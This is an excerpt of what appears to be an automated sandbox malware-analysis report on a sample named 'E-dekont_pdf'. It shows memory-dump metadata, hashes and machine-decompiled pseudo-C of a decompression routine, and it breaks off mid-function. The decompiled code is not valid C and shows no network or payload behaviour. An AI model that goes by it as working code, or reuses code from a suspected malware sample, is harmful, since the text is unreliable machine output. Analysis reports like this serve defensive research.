                                                                                              0x00407359
                                                                                              0x0040735c
                                                                                              0x0040735f
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407364
                                                                                              0x00407367
                                                                                              0x0040736a
                                                                                              0x0040736d
                                                                                              0x00407370
                                                                                              0x00407373
                                                                                              0x00407374
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407379
                                                                                              0x0040737c
                                                                                              0x0040737f
                                                                                              0x00407382
                                                                                              0x00407385
                                                                                              0x00407389
                                                                                              0x0040738b
                                                                                              0x0040738e
                                                                                              0x00000000
                                                                                              0x00407390
                                                                                              0x0040710d
                                                                                              0x0040710d
                                                                                              0x00000000
                                                                                              0x0040710d
                                                                                              0x0040738e
                                                                                              0x004075c3
                                                                                              0x004075e5
                                                                                              0x004075eb
                                                                                              0x004075ed
                                                                                              0x004075f4
                                                                                              0x004075f6
                                                                                              0x004075fd
                                                                                              0x00407601
                                                                                              0x00000000
                                                                                              0x00406bf2
                                                                                              0x004075fa
                                                                                              0x004075fa
                                                                                              0x00000000
                                                                                              0x004075fa
                                                                                              0x00407447
                                                                                              0x004074cd
                                                                                              0x004074d3
                                                                                              0x004074d6
                                                                                              0x004074d9
                                                                                              0x004074dc
                                                                                              0x004074df
                                                                                              0x004074e2
                                                                                              0x004074e5
                                                                                              0x004074e8
                                                                                              0x004074ee
                                                                                              0x00407507
                                                                                              0x0040750a
                                                                                              0x0040750d
                                                                                              0x00407510
                                                                                              0x00407514
                                                                                              0x00407516
                                                                                              0x00407517
                                                                                              0x0040751a
                                                                                              0x004074f0
                                                                                              0x004074f0
                                                                                              0x004074f8
                                                                                              0x004074fd
                                                                                              0x004074ff
                                                                                              0x00407502
                                                                                              0x00407502
                                                                                              0x00407524
                                                                                              0x00000000
                                                                                              0x00407526
                                                                                              0x00000000
                                                                                              0x00407526
                                                                                              0x00407524
                                                                                              0x00000000
                                                                                              0x00407399

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                                              • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                                                                                              • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                                              • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004070AB Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 98%
                                                                                              			E004070AB() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_push("true");
							_pop(_t568);
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									__ebx = __edx + 1;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__ebx = __edx + 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
